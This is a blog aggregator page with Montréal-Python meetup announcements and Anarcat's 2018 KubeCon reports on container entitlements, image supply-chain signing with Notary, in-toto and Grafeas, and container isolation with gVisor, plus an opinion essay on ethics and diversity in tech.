Skip to main content

External Blogs

Montréal-Python 72 - Carroty Xenophon

Montreal Python - Sun, 06/03/2018 - 23:00

Let’s meet one last time before our Summer break! Thanks to Notman House for sponsoring this event.

Presentations Socket - Éric Lafontaine

Most of our everyday job include doing request over the internet or hosting a web solution for our company. Each connections we make utilize the socket API in some way that is not always evident. I hope to, by giving this talk, elucidate some of the magic contained in the socket API. I'm also going to give away some trick that I've been using since understanding that API.

Probabilistic Programming and Bayesian Modeling with PyMC3 - Christopher Fonnesbeck

Bayesian statistics offers powerful, flexible methods for data analysis that, because they are based on full probability models, confer several benefits to analysts including scalability, straightforward quantification of uncertainty, and improved interpretability relative to classical methods. The advent of probabilistic programming has served to abstract the complexity associated with fitting Bayesian models, making such methods more widely available. PyMC3 is software for probabilistic programming in Python that implements several modern, computationally-intensive statistical algorithms for fitting Bayesian models. PyMC3’s intuitive syntax is helpful for new users, and its reliance on the Theano library for fast computation has allowed developers to keep the code base simple, making it easy to extend and expand the software to meet analytic needs. Importantly, PyMC3 implements several next-generation Bayesian computational methods, allowing for more efficient sampling for small models and better approximations to larger models with larger associated dataset. I will demonstrate how to construct, fit and check models in PyMC, using a selection of applied problems as motivation.

When

Monday June 11th, 2018 at 6PM

Where

Notman House

51 Sherbrooke West

Montréal, QC

H2X 1X2

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:00PM - End of the event
  • 8:15PM - Benelux
Categories: External Blogs

Diversity, education, privilege and ethics in technology

Anarcat - Sat, 05/26/2018 - 11:48

This article is part of a series on KubeCon Europe 2018.

This is a rant I wrote while attending KubeCon Europe 2018. I do not know how else to frame this deep discomfort I have with the way one of the most cutting edge projects in my community is moving. I see it as a symptom of so many things wrong in society at large and figured it was as good a way as any to open the discussion regarding how free software communities seem to naturally evolved into corporate money-making machines with questionable ethics.

A white man groomed by a white woman

Diversity and education

There is often a great point made of diversity at KubeCon, and that is something I truly appreciate. It's one of the places where I have seen the largest efforts towards that goal; I was impressed by the efforts done in Austin, and mentioned it in my overview of that conference back then. Yet it is still one of the less diverse places I've ever participated in: in comparison, Pycon "feels" more diverse, for example. And then, of course, there's real life out there, where women constitute basically half the population, of course. This says something about the actual effectiveness diversity efforts in our communities.

4000 white men

The truth is that contrary to programmer communities, "operations" knowledge (sysadmin, SRE, DevOps, whatever it's called these days) comes not from institutional education, but from self-learning. Even though I have years of university training, the day to day knowledge I need in my work as a sysadmin comes not from the university, but from late night experiments on my personal computer network. This was first on the Macintosh, then on the FreeBSD source code of passed down as a magic word from an uncle and finally through Debian consecrated as the leftist's true computing way. Sure, my programming skills were useful there, but I acquired those before going to university: even there teachers expected students to learn programming languages (such as C!) in-between sessions.

Diversity program

The real solutions to the lack of diversity in our communities not only comes from a change in culture, but also real investments in society at large. The mega-corporations subsidizing events like KubeCon make sure they get a lot of good press from those diversity programs. However, the money they spend on those is nothing compared to tax evasion in their home states. As an example, Amazon recently put 7000 jobs on hold because of a tax the city of Seattle wanted to impose on corporations to help the homeless population. Google, Facebook, Microsoft, and Apple all evade taxes like gangsters. This is important because society changes partly through education, and that costs money. Education is how more traditional STEM sectors like engineering and medicine have changed: women, minorities, and poorer populations were finally allowed into schools after the epic social struggles of the 1970s finally yielded more accessible education. The same way that culture changes are seeing a backlash, the tide is turning there as well and the trend is reversing towards more costly, less accessible education of course. But not everywhere. The impacts of education changes are long-lasting. By evading taxes, those companies are keeping the state from revenues that could level the playing field through affordable education.

Hell, any education in the field would help. There is basically no sysadmin education curriculum right now. Sure you can follow a Cisco CCNA or MSCE private trainings. But anyone who's been seriously involved in running any computing infrastructure knows those are a scam: that will tie you down in a proprietary universe (Cisco and Microsoft, respectively) and probably just to "remote hands monkey" positions and rarely to executive positions.

Velocity

Besides, providing an education curriculum would require the field to slow down so that knowledge would settle down and trickle into a curriculum. Configuration management is pretty old, but because the changes in tooling are fast, any curriculum built in the last decade (or even less) quickly becomes irrelevant. Puppet publishes a new release every 6 month, Kubernetes is barely 4 years old now, and is changing rapidly with a ~3 month release schedule.

Here at KubeCon, Mark Zuckerberg's mantra of "move fast and break things" is everywhere. We call it "velocity": where you are going does not matter as much as how fast you're going there. At one of the many keynotes, Abby Kearns from the Cloud Foundry Foundation boasted at how Home Depot, in trying to sell more hammers than Amazon, is now deploying code to production multiple times a day. I am still unclear as whether this made Home Depot actually sell more hammers, or if it's something that we should even care about in the first place. Shouldn't we converge over selling less hammers? Making them more solid, reliable, so that they are passed down from generations instead of breaking and having to be replaced all the time?

Home Depot ecstasy

We're solving a problem that wasn't there in some new absurd faith that code deployments will naturally make people happier, by making sure Home Depot sells more hammers. And that's after telling us that Cloud Foundry helped the USAF save 600M$ by moving their databases to the cloud. No one seems bothered by the idea that the most powerful military in existence would move state secrets into a private cloud, out of the control of any government. It's the name of the game, at KubeCon.

USAF saves (money)

In his keynote, Alexis Richardson, CEO of Weaveworks, presented the toaster project as an example of what not to do. "He did not use any sourced components, everything was built from scratch, by hand", obviously missing the fact that toasters are deliberately not built from reusable parts, as part of the planned obsolescence design. The goal of the toaster experiment is also to show how fragile our civilization has become precisely because we depend on layers upon layers of parts. In this totalitarian view of the world, people are also "reusable" or, in that case "disposable components". Not just the white dudes in California, but also workers outsourced out of the USA decades ago; it depends on precious metals and the miners of Africa, the specialized labour of the factories and intricate knowledge of the factory workers in Asia, and the flooded forests of the first nations powering this terrifying surveillance machine.

Privilege

"Left to his own devices he couldn’t build a toaster. He could just about make a sandwich and that was it." -- Mostly Harmless, Douglas Adams, 1992

Staying in an hotel room for a week, all expenses paid, certainly puts things in perspectives. Rarely have I felt more privileged in my entire life: someone else makes my food, makes my bed, and cleans up the toilet magically when I'm gone. For me, this is extraordinary, but for many people at KubeCon, it's routine: traveling is part of the rock star agenda of this community. People get used to being served, both directly in their day to day lives, but also through the complex supply chain of the modern technology that is destroying the planet.

Nothing is like corporate nothing.

The nice little boxes and containers we call the cloud all abstract this away from us and those dependencies are actively encouraged in the community. We like containers here and their image is ubiquitous. We acknowledge that a single person cannot run a Kube shop because the knowledge is too broad to be possibly handled by a single person. While there are interesting collaborative and social ideas in that approach, I am deeply skeptical of its impact on civilization in the long run. We already created systems so complex that we don't truly know who hacked the Trump election or how. Many feel it was, but it's really just a hunch: there were bots, maybe they were Russian, or maybe from Cambridge? The DNC emails, was that really Wikileaks? Who knows! Never mind failing close or open: the system has become so complex that we don't even know how we fail when we do. Even those in the highest positions of power seem unable to protect themselves; politics seem to have become a game of Russian roulette: we cock the bot, roll the secret algorithm, and see what dictator will shoot out.

Ethics

All this is to build a new Skynet; not this one or that one, those already exist. I was able to pleasantly joke about the AI takeover during breakfast with a random stranger without raising as much as an eyebrow: we know it will happen, oh well. I've skipped that track in my attendance, but multiple talks at KubeCon are about AI, TensorFlow (it's opensource!), self-driving cars, and removing humans from the equation as much as possible, as a general principle. Kubernetes is often shortened to "Kube", which I always think of as a reference to the Star Trek Borg all mighty ship, the "cube". This might actually make sense given that Kubernetes is an open source version of Google's internal software incidentally called... Borg. To make such fleeting, tongue-in-cheek references to a totalitarian civilization is not harmless: it makes more acceptable the notion that AI domination is inescapable and that resistance truly is futile, the ultimate neo-colonial scheme.

"We are the Borg. Your biological and technological distinctiveness will be added to our own. Resistance is futile."

The "hackers" of our age are building this machine with conscious knowledge of the social and ethical implications of their work. At best, people admit to not knowing what they really are. In the worse case scenario, the AI apocalypse will bring massive unemployment and a collapse of the industrial civilization, to which Silicon Valley executives are responding by buying bunkers to survive the eventual roaming gangs of revolted (and now armed) teachers and young students coming for revenge.

Only the most privileged people in society could imagine such a scenario and actually opt out of society as a whole. Even the robber barons of the 20th century knew they couldn't survive the coming revolution: Andrew Carnegie built libraries after creating the steel empire that drove much of US industrialization near the end of the century and John D. Rockefeller subsidized education, research and science. This is not because they were humanists: you do not become an oil tycoon by tending to the poor. Rockefeller said that "the growth of a large business is merely a survival of the fittest", a social darwinist approach he gladly applied to society as a whole.

But the 70's rebel beat offspring, the children of the cult of Job, do not seem to have the depth of analysis to understand what's coming for them. They want to "hack the system" not for everyone, but for themselves. Early on, we have learned to be selfish and self-driven: repressed as nerds and rejected in the schools, we swore vengeance on the bullies of the world, and boy are we getting our revenge. The bullied have become the bullies, and it's not small boys in schools we're bullying, it is entire states, with which companies are now negotiating as equals.

The fraud

...but what are you creating exactly?

And that is the ultimate fraud: to make the world believe we are harmless little boys, so repressed that we can't communicate properly. We're so sorry we're awkward, it's because we're all somewhat on the autism spectrum. Isn't that, after all, a convenient affliction for people that would not dare to confront the oppression they are creating? It's too easy to hide behind such a real and serious condition that does affect people in our community, but also truly autistic people that simply cannot make it in the fast-moving world the magical rain man is creating. But the real con is hacking power and political control away from traditional institutions, seen as too slow-moving to really accomplish the "change" that is "needed". We are creating an inextricable technocracy that no one will understand, not even us "experts". Instead of serving the people, the machine is at the mercy of markets and powerful oligarchs.

A recurring pattern at Kubernetes conferences is the KubeCon chant where Kelsey Hightower reluctantly engages the crowd in a pep chant:

When I say 'Kube!', you say 'Con!'

'Kube!' 'Con!' 'Kube!' 'Con!' 'Kube!' 'Con!'

Cube Con indeed...

I wish I had some wise parting thoughts of where to go from here or how to change this. The tide seems so strong that all I can do is observe and tell stories. My hope is that the people that need to hear this will take it the right way, but I somehow doubt it. With chance, it might just become irrelevant and everything will fix itself, but somehow I fear things will get worse before they get better.

Categories: External Blogs

Easier container security with entitlements

Anarcat - Mon, 05/21/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

During KubeCon + CloudNativeCon Europe 2018, Justin Cormack and Nassim Eddequiouaq presented a proposal to simplify the setting of security parameters for containerized applications. Containers depend on a large set of intricate security primitives that can have weird interactions. Because they are so hard to use, people often just turn the whole thing off. The goal of the proposal is to make those controls easier to understand and use; it is partly inspired by mobile apps on iOS and Android platforms, an idea that trickled back into Microsoft and Apple desktops. The time seems ripe to improve the field of container security, which is in desperate need of simpler controls.

The problem with container security

Cormack first stated that container security is too complicated. His slides stated bluntly that "unusable security is not security" and he pleaded for simpler container security mechanisms with clear guarantees for users.

"Container security" is a catchphrase that actually includes all sorts of measures, some of which we have previously covered. Cormack presented an overview of those mechanisms, including capabilities, seccomp, AppArmor, SELinux, namespaces, control groups — the list goes on. He showed how docker run --help has a "ridiculously large number of options"; there are around one hundred on my machine, with about fifteen just for security mechanisms. He said that "most developers don't know how to actually apply those mechanisms to make sure their containers are secure". In the best-case scenario, some people may know what the options are, but in most cases people don't actually understand each mechanism in detail.

He gave the example of capabilities; there are about forty possible values that can be provided for the --cap-drop option, each with its own meaning. He described some capabilities as "understandable", but said that others end up in overly broad boxes. The kernel's data structure limits the system to a maximum of 64 capabilities, so a bunch of functionality was lumped together into CAP_SYS_ADMIN, he said.

Cormack also talked about namespaces and seccomp. While there are fewer namespaces than capabilities, he said that "it's very unclear for a general user what their security properties are". For example, "some combinations of capabilities and namespaces will let you escape from a container, and other ones don't". He also described seccomp as a "long JSON file" as that's the way Kubernetes configures it. Even though he said those files could "usefully be even more complicated" and said that the files are "very difficult to write".

Cormack stopped his enumeration there, but the same applies to the other mechanisms. He said that while developers could sit down and write those policies for their application by hand, it's a real mess and makes their heads explode. So instead developers run their containers in --privileged mode. It works, but it disables all the nice security mechanisms that the container abstraction provides. This is why "containers do not contain", as Dan Walsh famously quipped.

Introducing entitlements

There must be a better way. Eddequiouaq proposed this simple idea: "provide something humans can actually understand without diving into code or possibly even without reading documentation". The solution proposed by the Docker security team is "entitlements": the ability for users to choose simple permissions on the command line. Eddequiouaq said that application users and developers alike don't need to understand the low-level security mechanisms or how they interact within the kernel; "people don't care about that, they want to make sure their app is secure."

Entitlements divide resources into meaningful domains like "network", "security", or "host resources" (like devices). Behind the scenes, Docker translates those into whatever security mechanisms are available. This implies that the actual mechanism deployed will vary between runtimes, depending on the implementation. For example, a "confined" network access might mean a seccomp filter blocking all networking-related system calls except socket(AF_UNIX|AF_LOCAL) along with dropping network-related capabilities. AppArmor will deny network on some platforms while SELinux would do similar enforcement on others.

Eddequiouaq said the complexity of implementing those mechanisms is the responsibility of platform developers. Image developers can ship entitlement lists along with container images created with a regular docker build, and sign the whole bundle with docker trust. Because entitlements do not specify explicit low-level mechanisms, the resulting image is portable to different runtimes without change. Such portability helps Kubernetes on non-Linux platforms do its job.

Entitlements shift the responsibility for configuring sandboxing environments to image developers, but also empowers them to deliver security mechanisms directly to end users. Developers are the ones with the best knowledge about what their applications should or should not be doing. Image end-users, in turn, benefit from verifiable security properties delivered by the bundles and the expertise of image developers when they docker pull and run those images.

Eddequiouaq gave a demo of the community's nemesis: Docker inside Docker (DinD). He picked that use case because it requires a lot of privileges, which usually means using the dreaded --privileged flag. With the entitlements patch, he was able to run DinD with network.admin, security.admin, and host.devices.admin, which looks like --privileged, but actually means some protections are still in place. According to Eddequiouaq, "everything works and we didn't have to disable all the seccomp and AppArmor profiles". He also gave a demo of how to build an image and demonstrated how docker inspect shows the entitlements bundled inside the image. With such an image, docker run starts a DinD image without any special flags. That requires a way to trust the content publisher because suddenly images can elevate their own privileges without the caller specifying anything on the Docker command line.

Goals and future

The specification aims to provide the best user experience possible, so that people actually start using the security mechanisms provided by the platforms instead of opting out of security configurations when they get a "permission denied" error. Eddequiouaq said that Docker eventually wants to "ditch the --privileged flag because it is really a bad habit". Instead, applications should run with the least privileges they need. He said that "this is not the case; currently, everyone works with defaults that work with 95% of the applications out there." Those Docker defaults, he said, provide a "way too big attack surface".

Eddequiouaq opened the door for developers to define custom entitlements because "it's hard to come up with a set that will cover all needs". One way the team thought of dealing with that uncertainty is to have versions of the specification but it is unclear how that would work in practice. Would the version be in the entitlement labels (e.g. network-v1.admin), or out of band?

Another feature proposed is the control of API access and service-to-service communication in the security profile. This is something that's actually available on phones, where an app can only talk with a specific set of services. But that is also relevant to containers in Kubernetes clusters as administrators often need to restrict network access with more granularity than the "open/filter/close" options. An example of such policy could allow the "web" container to talk with the "database" container, although it might be difficult to specify such high-level policies in practice.

While entitlements are now implemented in Docker as a proof of concept, Kubernetes has the same usability issues as Docker so the ultimate goal is to get entitlements working in Kubernetes runtimes directly. Indeed, its PodSecurityPolicy maps (almost) one-to-one with the Docker security flags. But as we have previously reported, another challenge in Kubernetes security is that the security models of Kubernetes and Docker are not exactly identical.

Eddequiouaq said that entitlements could help share best security policies for a pod in Kubernetes. He proposed that such configuration would happen through the SecurityContext object. Another way would be an admission controller that would avoid conflicts between the entitlements in the image and existing SecurityContext profiles already configured in the cluster. There are two possible approaches in that case: the rules from the entitlements could expand the existing configuration or restrict it where the existing configuration becomes a default. The problem here is that the pod's SecurityContext already provides a widely deployed way to configure security mechanisms, even if it's not portable or easy to share, so the proposal shouldn't break existing configurations. There is work in progress in Docker to allow inheriting entitlements within a Dockerfile. Eddequiouaq proposed that Kubernetes should implement a simple mechanism to inherit entitlements from images in the admission controller.

The Docker security team wants to create a "widely adopted standard" supported by Docker swarm, Kubernetes, or any container scheduler. But it's still unclear how deep into the Kubernetes stack entitlements belong. In the team's current implementation, Docker translates entitlements into the security mechanisms right before calling its runtime (containerd), but it might be possible to push the entitlements concept straight into the runtime itself, as it knows best how the platform operates.

Some readers might also notice fundamental similarities between this and other mechanisms such as OpenBSD's pledge(), which made me wonder if entitlements belong in user space in the first place. Cormack observed that seccomp was such a "pain to work with to do complicated policies". He said that having eBPF seccomp filters would make it easier to deal with conflicts between policies and also mentioned the work done on the Checmate and Landlock security modules as interesting avenues to explore. It seems that none of those kernel mechanisms are ready for prime time, at least not to the point that Docker can use them in production. Eddequiouaq said that the proposal was open to changes and discussion so this is all work in progress at this stage. The next steps are to make a proposal to the Kubernetes community before working on an actual implementation outside of Docker.

I have found the core idea of protecting users from all the complicated stuff in container security interesting. It is a recurring theme in container security; we've previously discussed proposals to add container identifiers in the kernel directly for example. Everyone knows security is sensitive and important in Kubernetes, yet doing it correctly is hard. This is a recipe for disaster, which has struck in high profile cases recently. Hopefully having such easier and cleaner mechanisms will help users, developers, and administrators alike.

A YouTube video and slides [PDF] of the talk are available.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Securing the container image supply chain

Anarcat - Thu, 05/17/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

KubeCon EU "Security is hard" is a tautology, especially in the fast-moving world of container orchestration. We have previously covered various aspects of Linux container security through, for example, the Clear Containers implementation or the broader question of Kubernetes and security, but those are mostly concerned with container isolation; they do not address the question of trusting a container's contents. What is a container running? Who built it and when? Even assuming we have good programmers and solid isolation layers, propagating that good code around a Kubernetes cluster and making strong assertions on the integrity of that supply chain is far from trivial. The 2018 KubeCon + CloudNativeCon Europe event featured some projects that could eventually solve that problem.

Image provenance

A first talk, by Adrian Mouat, provided a good introduction to the broader question of "establishing image provenance and security in Kubernetes" (video, slides [PDF]). Mouat compared software to food you get from the supermarket: "you can actually tell quite a lot about the product; you can tell the ingredients, where it came from, when it was packaged, how long it's good for". He explained that "all livestock in Europe have an animal passport so we can track its movement throughout Europe and beyond". That "requires a lot of work, and time, and money, but we decided that this is was worthwhile doing so that we know [our food is] safe to eat. Can we say the same thing about the software running in our data centers?" This is especially a problem in complex systems like Kubernetes; containers have inherent security and licensing concerns, as we have recently discussed.

You should be able to easily tell what is in a container: what software it runs, where it came from, how it was created, and if it has any known security issues, he said. Mouat also expects those properties to be provable and verifiable with strong cryptographic assertions. Kubernetes can make this difficult. Mouat gave a demonstration of how, by default, the orchestration framework will allow different versions of the same container to run in parallel. In his scenario, this is because the default image pull policy (ifNotPresent) might pull a new version on some nodes and not others. This problem arises because of an inconsistency between the way Docker and Kubernetes treat image tags; the former as mutable and the latter as immutable. Mouat said that "the default semantics for pulling images in Kubernetes are confusing and dangerous." The solution here is to deploy only images with tags that refer to a unique version of a container, for example by embedding a Git hash or unique version number in the image tag. Obviously, changing the policy to AlwaysPullImages will also help in solving the particular issue he demonstrated, but will create more image churn in the cluster.

But that's only a small part of the problem; even if Kubernetes actually runs the correct image, how can you tell what is actually in that image? In theory, this should be easy. Docker seems like the perfect tool to create deterministic images that consist exactly of what you asked for: a clean and controlled, isolated environment. Unfortunately, containers are far from reproducible and the problem begins on the very first line of a Dockerfile. Mouat gave the example of a FROM debian line, which can mean different things at different times. It should normally refer to Debian "stable", but that's actually a moving target; Debian makes new stable releases once in a while, and there are regular security updates. So what first looks like a static target is actually moving. Many Dockerfiles will happily fetch random source code and binaries from the network. Mouat encouraged people to at least checksum the downloaded content to prevent basic attacks and problems.

Unfortunately, all this still doesn't get us reproducible builds since container images include file timestamps, build identifiers, and image creation time that will vary between builds, making container images hard to verify through bit-wise comparison or checksums. One solution there is to use alternative build tools like Bazel that allow you to build reproducible images. Mouat also added that there is "tension between reproducibility and keeping stuff up to date" because using hashes in manifests will make updates harder to deploy. By using FROM debian, you automatically get updates when you rebuild that container. Using FROM debian:stretch-20180426 will get you a more reproducible container, but you'll need to change your manifest regularly to follow security updates. Once we know what is in our container, there is at least a standard in the form of the OCI specification that allows attaching annotations to document the contents of containers.

Another problem is making sure containers are up to date, a "weirdly hard" question to answer according to Mouat: "why can't I ask my registry [if] there is new version of [a] tag, but as far as I know, there's no way you can do that." Mouat literally hand-waved at a slide showing various projects designed to scan container images for known vulnerabilities, introducing Aqua, Clair, NeuVector, and Twistlock. Mouat said we need a more "holistic" solution than the current whack-a-mole approach. His company is working on such a product called Trow, but not much information about it was available at the time of writing.

The long tail of the supply chain

Verifying container images is exactly the kind of problem Notary is designed to solve. Notary is a server "that allows anyone to have trust over arbitrary collections of data". In practice, that can be used by the Docker daemon as an additional check before fetching images from the registry. This allows operators to approve images with cryptographic signatures before they get deployed in the cluster.

Notary implements The Update Framework (TUF), a specification covering the nitty-gritty details of signatures, key rotation, and delegation. It keeps signed hashes of container images that can be used for verification; it can be deployed by enabling Docker's "content Trust" in any Docker daemon, or by configuring a custom admission controller with a web hook in Kubernetes. In another talk (slides [PDF], video) Liam White and Michael Hough covered the basics of Notary's design and how it interacts with Docker. They also introduced Porteiris as an admission controller hook that can implement a policy like "allow any image from the LWN Docker registry as long as it's signed by your favorite editor". Policies can be scoped by namespace as well, which can be useful in multi-tenant clusters. The downside of Porteris is that it supports only IBM Cloud Notary servers because the images need to be explicitly mapped between the Notary server and the registry. The IBM team knows only about how to map its own images but the speakers said they were open to contributions there.

A limitation of Notary is that it looks only at the last step of the build chain; in itself, it provides no guarantees on where the image comes from, how the image was built, or what it's made of. In yet another talk (slides [PDF] video), Wendy Dembowski and Lukas Puehringer introduced a possible solution to that problem: two projects that work hand-in-hand to provide end-to-end verification of the complete container supply chain. Puehringer first introduced the in-toto project as a tool to authenticate the integrity of individual build steps: code signing, continuous integration (CI), and deployment. It provides a specification for "open and extensible" metadata that certifies how each step was performed and the resulting artifacts. This could be, at the source step, as simple as a Git commit hash or, at the CI step, a build log and artifact checksums. All steps are "chained" as well, so that you can track which commit triggered the deployment of a specific image. The metadata is cryptographically signed by role keys to provide strong attestations as to the provenance and integrity of each step. The in-toto project is supervised by Justin Cappos, who also works on TUF, so it shares some of its security properties and integrates well with the framework. Each step in the build chain has its own public/private key pair, with support for role delegation and rotation.

In-toto is a generic framework allowing a complete supply chain verification by providing "attestations" that a given artifact was created by the right person using the right source. But it does not necessarily provide the hooks to do those checks in Kubernetes itself. This is where Grafeas comes in, by providing a global API to read and store metadata. That can be package versions, vulnerabilities, license or vulnerability scans, builds, images, deployments, and attestations such as those provided by in-toto. All of those can then be used by the Kubernetes admission controller to establish a policy that regulates image deployments. Dembowski referred to this tutorial by Kelsey Hightower as an example configuration to integrate Grafeas in your cluster. According to Puehringer: "It seems natural to marry the two projects together because Grafeas provides a very well-defined API where you can push metadata into, or query from, and is well integrated in the cloud ecosystem, and in-toto provides all the steps in the chain."

Dembowski said that Grafeas is already in use at Google and it has been found useful to keep track of metadata about containers. Grafeas can keep track of what each container is running, who built it, when (sometimes vulnerable) code was deployed, and make sure developers do not ship containers built on untrusted development machines. This can be useful when a new vulnerability comes out and administrators scramble to figure out if or where affected code is deployed.

Puehringer explained that in-toto's reference implementation is complete and he is working with various Linux distributions to get them to use link metadata to have their package managers perform similar verification.

Conclusion

The question of container trust hardly seems resolved at all; the available solutions are complex and would be difficult to deploy for Kubernetes rookies like me. However, it seems that Kubernetes could make small improvements to improve security and auditability, the first of which is probably setting the image pull policy to a more reasonable default. In his talk, Mouat also said it should be easier to make Kubernetes fetch images only from a trusted registry instead of allowing any arbitrary registry by default.

Beyond that, cluster operators wishing to have better control over their deployments should start looking into setting up Notary with an admission controller, maybe Portieris if they can figure out how to make it play with their own Notary servers. Considering the apparent complexity of Grafeas and in-toto, I would assume that those would probably be reserved only to larger "enterprise" deployments but who knows; Kubernetes may be complex enough as it is that people won't mind adding a service or two in there to improve its security. Keep in mind that complexity is an enemy of security, so operators should be careful when deploying solutions unless they have a good grasp of the trade-offs involved.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Updates in container isolation

Anarcat - Wed, 05/16/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

KubeCon EU At KubeCon + CloudNativeCon Europe 2018, several talks explored the topic of container isolation and security. The last year saw the release of Kata Containers which, combined with the CRI-O project, provided strong isolation guarantees for containers using a hypervisor. During the conference, Google released its own hypervisor called gVisor, adding yet another possible solution for this problem. Those new developments prompted the community to work on integrating the concept of "secure containers" (or "sandboxed containers") deeper into Kubernetes. This work is now coming to fruition; it prompts us to look again at how Kubernetes tries to keep the bad guys from wreaking havoc once they break into a container.

Attacking and defending the container boundaries

Tim Allclair's talk (slides [PDF], video) was all about explaining the possible attacks on secure containers. To simplify, Allclair said that "secure is isolation, even if that's a little imprecise" and explained that isolation is directional across boundaries: for example, a host might be isolated from a guest container, but the container might be fully visible from the host. So there are two distinct problems here: threats from the outside (attackers trying to get into a container) and threats from the inside (attackers trying to get out of a compromised container). Allclair's talk focused on the latter. In this context, sandboxed containers are concerned with threats from the inside; once the attacker is inside the sandbox, they should not be able to compromise the system any further.

Attacks can take multiple forms: untrusted code provided by users in multi-tenant clusters, un-audited code fetched from random sites by trusted users, or trusted code compromised through an unknown vulnerability. According to Allclair, defending a system from a compromised container is harder than defending a container from external threats, because there is a larger attack surface. While outside attackers only have access to a single port, attackers on the inside often have access to the kernel's extensive system-call interface, a multitude of storage backends, the internal network, daemons providing services to the cluster, hardware interfaces, and so on.

Taking those vectors one by one, Allclair first looked at the kernel and said that there were 169 code execution vulnerabilities in the Linux kernel in 2017. He admitted this was a bit of fear mongering; it indeed was a rather unusual year and "most of those were in mobile device drivers". These vulnerabilities are not really a problem for Kubernetes unless you run it on your phone. Allclair said that at least one attendee at the conference was probably doing exactly that; as it turns out, some people have managed to run Kubernetes on a vacuum cleaner. Container runtimes implement all sorts of mechanisms to reduce the kernel's attack surface: Docker has seccomp profiles, but Kubernetes turns those off by default. Runtimes will use AppArmor or SELinux rule sets. There are also ways to run containers as non-root, which was the topic of a pun-filled separate talk as well. Unfortunately, those mechanisms do not fundamentally solve the problem of kernel vulnerabilities. Allclair cited the Dirty COW vulnerability as a classic example of a container escape through race conditions on system calls that are allowed by security profiles.

The proposed solution to this problem is to add a second security boundary. This is apparently an overarching principle at Google, according to Allclair: "At Google, we have this principle security principle that between any untrusted code and user data there have to be at least two distinct security boundaries so that means two independent security mechanisms need to fail in order to for that untrusted code to get out that user data."

Adding another boundary makes attacks harder to accomplish. One such solution is to use a hypervisor like Kata Containers or gVisor. Those new runtimes depend on a sandboxed setting that is still in the proposal stage in the Kubernetes API.

gVisor as an extra boundary

Let's look at gVisor as an example hypervisor. Google spent five years developing the project in the dark before sharing it with the world. At KubeCon, it was introduced in a keynote and a more in-depth talk (slides [PDF], video) by Dawn Chen and Zhengyu He. gVisor is a user-space kernel that implements a subset of the Linux kernel API, but which was written from scratch in Go. The idea is to have an independent kernel that reduces the attack surface; while the Linux kernel has 20 million lines of code, at the time of writing gVisor only has 185,000, which should make it easier to review and audit. It provides a cleaner and simpler interface: no hardware drivers, interrupts, or I/O port support to implement, as the host operating system takes care of all that mess.

As we can see in the diagram above (taken from the talk slides), gVisor has a component called "sentry" that implements the core of the system-call logic. It uses ptrace() out of the box for portability reasons, but can also work with KVM for better security and performance, as ptrace() is slow and racy. Sentry can use KVM to map processes to CPUs and provide lower-level support like privilege separation and memory-management. He suggested thinking of gVisor as a "layered solution" to provide isolation, as it also uses seccomp filters and namespaces. He explained how it differed from user-mode Linux (UML): while UML is a port of Linux to user space, gVisor actually reimplements the Linux system calls (211 of the 319 x86-64 system calls) using only 64 system calls in the host system. Another key difference from other systems, like unikernels or Google's Native Client (NaCL), is that it can run unmodified binaries. To fix classes of attacks relying on the open() system call, gVisor also forbids any direct filesystem access; all filesystem operations go through a second process called the gopher that enforces access permissions, in another example of a double security boundary.

According to He, gVisor has a 150ms startup time and 15MB overhead, close to Kata Containers startup times, but smaller in terms of memory. He said the approach is good for small containers in high-density workloads. It is not so useful for trusted images (because it's not required), workloads that make heavy use of system calls (because of the performance overhead), or workloads that require hardware access (because that's not available at all). Even though gVisor implements a large number of system calls, some functionality is missing. There is no System V shared memory, for example, which means PostgreSQL does not work under gVisor. A simple ping might not work either, as gVisor lacks SOCK_RAW support. Linux has been in use for decades now and is more than just a set of system calls: interfaces like /proc and sysfs also make Linux what it is. ~~gVisor implements none of those~~ Of those, gVisor only implements a subset of /proc currently, with the result that some containers will not work with gVisor without modification, for now.

As an aside, the new hypervisor does allow for experimentation and development of new system calls directly in user space. The speakers confirmed this was another motivation for the project; the hope is that having a user-space kernel will allow faster iteration than working directly in the Linux kernel.

Escape from the hypervisor

Of course, hypervisors like gVisor are only a part of the solution to pod security. In his talk, Allclair warned that even with a hypervisor, there are still ways to escape a container. He cited the CVE-2017-1002101 vulnerability, which allows hostile container images to take over a host through specially crafted symbolic links. Like native containers, hypervisors like Kata Containers also allow the guest to mount filesystems across the container boundary, so they are vulnerable to such an attack.

Kubernetes fixed that specific bug, but a general solution is still in the design phase. Allclair said that ephemeral storage should be treated as opaque to the host, making sure that the host never interacts directly with image files and just passes them down to the guest untouched. Similarly, runtimes should "mount block volumes directly into the sandbox, not onto the host". Network filesystems are trickier; while it's possible to mount (say) a Ceph filesystem in the guest, that means the access credentials now reside within the guest, which moves the security boundary into the untrusted container.

Allclair outlined networking as another attack vector: Kubernetes exposes a lot of unauthenticated services on the network by default. In particular, the API server is a gold mine of information about the cluster. Another attack vector is untrusted data flows from containers to the user. For example, container logs travel through various Kubernetes components, and some components, like Fluentd, will end up parsing those logs directly. Allclair said that many different programs are "looking at untrusted data; if there's a vulnerability there, it could lead to remote code execution". When he looked at the history of vulnerabilities in that area, he could find no direct code execution, but "one of the dependencies in Fluentd for parsing JSON has seven different bugs with segfault issues so we can see that could lead to a memory vulnerability". As a possible solution to such issues, Allclair proposed isolating components in their own (native, as opposed to sandboxed) containers, which might be sufficient because Fluentd acts as a first trusted boundary.

Conclusion

A lot of work is happening to improve what is widely perceived as defective container isolation in the Linux kernel. Some take the approach of trying to run containers as regular users ("root-less containers") and rely on the Linux kernel's user-isolation properties. Others found this relies too much on the security of the kernel and use separate hypervisors, like Kata Containers and gVisor. The latter seems especially interesting because it is lightweight and doesn't add much attack surface. In comparison, Kata Containers relies on a kernel running inside the container, which actually expands the attack surface instead of reducing it. The proposed API for sandboxed containers is currently experimental in the containerd and CRI-O projects; Allclair expects the API to ship in alpha as part the Kubernetes 1.12 release.

It's important to keep in mind that hypervisors are not a panacea: they do not support all workloads because of compatibility and performance issues. A hypervisor is only a partial solution; Allclair said the next step is to provide hardened interfaces for storage, logging, and networking and encouraged people to get involved in the node special interest group and the proposal [Google Docs] on the topic.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Montreal-Python 72: Call for speakers

Montreal Python - Sun, 05/13/2018 - 23:00

